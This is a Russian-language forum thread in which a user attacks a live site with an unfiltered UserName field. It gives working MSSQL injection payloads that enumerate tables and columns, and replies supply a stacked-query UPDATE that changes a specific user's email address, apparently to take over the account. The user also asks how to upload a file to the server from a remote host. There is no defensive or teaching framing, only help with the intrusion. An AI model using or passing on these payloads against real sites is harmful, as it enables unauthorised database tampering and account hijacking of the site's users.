mssql-injection - need help...
 

Есть сайт, на нем поле UserName не фильтруется...
запросом
1' or 1=(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES)--
узнаю имена таблиц
1' or 1=(SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='users')--
так калонки

как мне выполнить запрос:
UPDATE users SET email_address='qwerty@gmail.com' WHERE user_name='hzhzhz'

1 or 1=(UPDATE users SET email_address='qwerty@gmail.com' WHERE user_name='hzhzhz')
скорее всего у тебя просто прав не хватит

я сразу так делал:
1' or 1=(UPDATE users SET email_address='qwerty@gmail.com' WHERE user_name='hzhzhz')--

Обычно делают так:
1';UPDATE users SET email_address='qwerty@gmail.com' WHERE user_name='hzhzhz'--

Апдейт в подзапросах использовать нельзя.

спасибо, я сам не допер...

>Апдейт в подзапросах использовать нельзя.
буду знать...

;UPDATE users SET email_address='qwerty@gmail.com' WHERE user_name='hzhzhz'--

еще вапрос, при запросе
1' or 1=(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%25admin%25')--

через секунд 15-20 выдает:
можно как-нить обойти?

нету значит таблиц таких.
А вообще советую вместо or использовать and.

в чем разница?

как можно через mssql-injection залить файл на сервер с удаленного сайта?

а в английском языке какая разница между Or и And? такая же и тут